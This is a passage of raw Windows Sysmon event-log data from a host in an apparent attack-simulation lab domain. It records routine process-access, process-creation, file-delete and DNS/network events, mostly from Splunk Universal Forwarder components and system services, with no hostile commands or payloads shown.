Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002243666Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:54.922{05ADC7E1-6E1A-603E-ECAA-00000000AD01}13008C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002243665Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:54.795{05ADC7E1-229F-6039-0D00-00000000AD01}62014144C:\Windows\system32\svchost.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243664Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:54.795{05ADC7E1-229F-6039-0D00-00000000AD01}62014144C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243663Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:54.795{05ADC7E1-229F-6039-0D00-00000000AD01}62014144C:\Windows\system32\svchost.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002243662Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:54.686{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B659286B73C2EAE1C4F2B91DCCE566A0,SHA256=A61ED7F352430E50597B751D2421732E41511FEA59D6F4E6D9ABF8DEEE7644A3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243661Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:54.389{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6E1A-603E-EBAA-00000000AD01}10600C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243660Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:54.389{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243659Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:54.389{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243658Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:54.389{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243657Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:54.389{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243656Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:54.389{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6E1A-603E-EBAA-00000000AD01}10600C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002243655Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:54.389{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6E1A-603E-EBAA-00000000AD01}10600C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002243654Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:54.390{05ADC7E1-6E1A-603E-EBAA-00000000AD01}10600C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002243684Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:55.717{05ADC7E1-6E1B-603E-EDAA-00000000AD01}563213172C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002243683Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:55.717{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D25028B43AE79AB812FA27EA4F65A21,SHA256=D003BD2A9B96F77524145609251806006509DFA4AD5A277B8F66929760981DDC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243682Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:55.529{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6E1B-603E-EDAA-00000000AD01}5632C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243681Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:55.529{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243680Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:55.529{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243679Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:55.529{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243678Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:55.529{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243677Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:55.529{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-6E1B-603E-EDAA-00000000AD01}5632C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002243676Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:55.529{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6E1B-603E-EDAA-00000000AD01}5632C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002243675Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:55.531{05ADC7E1-6E1B-603E-EDAA-00000000AD01}5632C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002243674Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:55.420{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8A8403947EF9DF02851F9A30615C65E8,SHA256=71E8282B8794E71A40D7546965BC2EF5FEDEFEEF8620E7F2F689CFB53AD11204,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243687Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:56.748{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7ABA1506DC6CD46DD9E5E8C726EFC26,SHA256=E36989BBA6AE780EC31C0FDD5BFC62030EAF49C54AB611DF1BFB968E8116EC8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243686Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:56.565{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2F19E5981BAE5D6728A32AE4573854B2,SHA256=30292A4E51D245DFDBD8FDB4B59831549183391C5396AD92894661BEE821E687,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002243685Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:45.769{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local54564- 23542300x80000000000000002243689Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:57.811{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=166E2AFF48824940685D1FE09687542C,SHA256=85B3472A6A817EE43DDE17A2A6B4FBF4AE9A8EB05893ADE815D74509C1875238,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002243688Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:46.784{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local54564- 23542300x80000000000000002243693Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:58.826{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFAE0A1560ACCCB2F7DFF3BDFA0E518A,SHA256=759C7305394F9B88CAF3B6871FD9A440CE395196F78E6447D3078438E8E72DB4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243692Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:58.639{05ADC7E1-229F-6039-0D00-00000000AD01}62014144C:\Windows\system32\svchost.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000002243691Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:48.270{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60177-false10.0.1.12-8000- 23542300x80000000000000002243690Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:58.154{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EB43E8C56E4FCA44D32615F03B70B370,SHA256=99DCAE50DF87277C8DC10EAD71E32F0D9BD25BB659D0D9A99AE086BE81AAF5A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243696Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:59.857{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB3749D8A9737F9E52E5CD6A43205B01,SHA256=8A2073E8E2473284D62D481CC84406D4425060062CBBDDE728B44BBE6FB514C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243695Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:59.774{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=71E394CCB422B6688A22C71212403A0E,SHA256=F3122E80885AFAB00FACB55335D8E458A1DD4C13606AC769AF9E6A0FE44E223F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002243694Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:48.894{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local52179- 23542300x80000000000000002243698Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:00.875{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 